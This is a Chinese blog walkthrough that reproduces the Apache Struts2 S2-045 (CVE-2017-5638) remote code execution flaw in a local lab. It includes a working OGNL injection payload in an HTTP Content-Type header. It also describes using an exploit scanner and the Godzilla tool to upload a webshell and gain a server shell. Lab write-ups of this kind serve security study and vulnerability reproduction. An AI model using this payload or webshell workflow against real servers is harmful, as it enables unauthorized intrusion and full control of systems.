struts2-045 远程代码执行漏洞(CVE-2017-5638)

已于 2023-09-16 22:21:07 修改
阅读量1.2k 收藏 2
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全 服务器
于 2023-06-02 11:02:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/131002631
版权
文章详细描述了如何在Ubuntu系统中设置并开启S2-045远程代码执行漏洞环境,通过浏览器访问并上传文件,抓取和修改数据包来触发漏洞。利用Struts2漏洞检测工具和哥斯拉生成并上传木马文件,最终获取服务器的shell,展示了整个漏洞利用过程。
摘要由CSDN通过智能技术生成

目录

S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境

S2-045 远程代码执行漏洞(CVE-2017-5638)

开启漏洞环境

 进入Ubuntu系统下的对应漏洞环境,开启环境

443c8b97fcc37ce64e8b1069023097a7.png

 将漏洞环境开启来

d3a0e5616b3128e6f6ecdf5bfcb88371.png

查看是否启动成功

2cec38063d847f84754bcd68b87f2c7c.png

 启动成功过后,去浏览器进行访问:
通过浏览器去访问该漏洞环境
 http://ip:8080

335074169bbf20760e2c19d8915e5dce.png

 接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化

随便上传一个文件

46bb7cf065b95e050a53ab97cf375e20.png

抓取数据包:

抓取数据包,修改数据包,查看修改后,收到的响应数据
 ​
 直接发送以下数据包
 POST / HTTP/1.1
 Host: localhost:8080
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.8,es;q=0.6
 Connection: close
 Content-Length: 0
 Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data
 ​
 发现123+123已经被执行,显示出结果

抓包

fa412675daa1d6e4ae9c16592007eb26.png

发给重发器过后:

 修改数据包信息,查看响应

7fdda7874260d55712e615656257d861.png

 观察发现我们输入的123+123,已经被执行

 解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell
 工具:哥斯拉、struts2漏洞检测工具

打开哥斯拉,生成木马:

ab53582cab5a79b49373da384a7a1bb3.png

 查看木马文件

2803267960a1f99cac7624e956148b75.png

 将随意的文件尝试上传,观察url变化

f5ea321e07127f9fca51bb59e9df21ba.png

 上传后,观察此url

432de02917b92dd29090f6f14a337e41.png

 
复制此url,借助第三方工具进行扫描
 工具:struts2漏洞扫描工具

27e8ee4b8b54263b9dd87dc8c7c25ce7.png

 查看检查结果,存在漏洞

eb8619af20892b5178d646073d3f06c1.png

 验证漏洞

fda3214a244a6d0d29c8515ca5020a4a.png

 远程命令执行

c957674c6f0df27049072a396190eb68.png

 查看根目录下的内容

6acf5d16f4d1df8964af1cf5bca0fc61.png

 点击文件上传模块,尝试上传木马文件

a0875707e81f29f95c783124283611e0.png

 查看是否能够上传成功,观察到已经上传成功

ea682d3fac9af91666d566f73535a968.png

strut2漏洞检测以及利用工具地址:

https://github.com/shack2/Struts2VulsTools/releases/tag/2.3.20190927

 观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接

3e4a89c124e3524e31d9155f800da547.png

 通过哥斯拉来进行连接

fee7fc88f5a52f45e784cff3719f9e18.png

 连接成功,进行添加,进入,成功拿到服务器shell

c93cd155b5952423d89c08b4da52000b.png

 成功添加

6edb7db638e8da158d04fbab88e36ff1.png

 点击进入即可,成功拿到shell

94231fc5228390f31e80febe3448fb61.png

可对文件进行任何操作:

67c5ce8ef9ca360fbdcaf169f5e5fa67.png

文章不妥之处,欢迎批评指正! 

rumilc
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)复现
薛定谔嘚喵博客
05-30 213
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045CVE-2017-5638
qq_51577576的博客
10-17 592
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2 S2-045 远程代码执行漏洞CVE-2017-5638
qq_68163788的博客
06-24 707
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行
Struts2 S2-045远程执行代码漏东
最新发布
weixin_42503415的博客
07-27 58
Struts2 S2-045远程执行代码漏懂允许公鸡者通过创建恶意的HTTP请求来远程执行系统命令。具体来说,S2-045漏懂是因为在使用基于Jakarta插件的文件上传功能时,Struts2框架未能正确处理用户输入的错误信息。当进行文件上传时,如果恶意用户修改了HTTP请求头中的Content-Type值,这可能会触发异...
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)复现
qq_40640917的博客
02-23 2365
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码
struts2-046 远程代码执行CVE-2017-5638
qq_32445755的博客
03-10 979
Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 目前,Struts框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1081
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
S2-046 远程代码执行漏洞CVE-2017-5638
玄道的网安博客
06-29 995
前言 使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。 影响版本 Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞环境 执行如下命令启动struts2 2.3.30: docker-compose up -d 访问http://your-ip:8080即可看到上传页面。 漏洞复现 与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断。 由于需要发送畸形数据包
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638
qq_51577576的博客
11-20 812
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
Struts2 s2-045
2301_76467680的博客
07-01 447
3.构造poc,使用抓包工具Burpsuite,修改数据包插入poc。把上面的代码粘贴到content-type字段发送显示。同样粘贴到content-type字段。
漏洞复现】S2-045 Remote Code Execution(CVE-2017-5638)
过期的秋刀鱼
11-05 1287
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。造成机密数据泄露,重要信息遭到篡改等重大危害。如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切 换到不同的实现文件上传Multipart解析器。,可以看到上传页面的示例。
struts2-045远程命令执行漏洞
u013894638的博客
03-14 1608
漏洞引发的威胁: 服务器直接被远程控制。 CVSS:(AV:R/AC:L/Au:NR/C:C/A:C/I:C) score:10.00(最高10分,高危) 即:远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性均造成完全影响。 影响产品: Apache Struts Xwork 信息来源: CNVD 解决方法: 把Struts2的版本升级到Struts2.3.32版本
struts2 S2-045漏洞
qzxdh的专栏
03-07 6325
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 漏洞编号:  CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述:
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7446
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
【S2-045Struts2远程命令执行漏洞(CVE-2017-5638)
热门推荐
Jaychouzzk
11-05 2万+
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts版本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实验文件 实验目的: 了解S2-045 Struts2远程命令执行漏洞危害 掌握检测修复S2-045 Struts2远程命令执行漏洞技术 实验文件: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值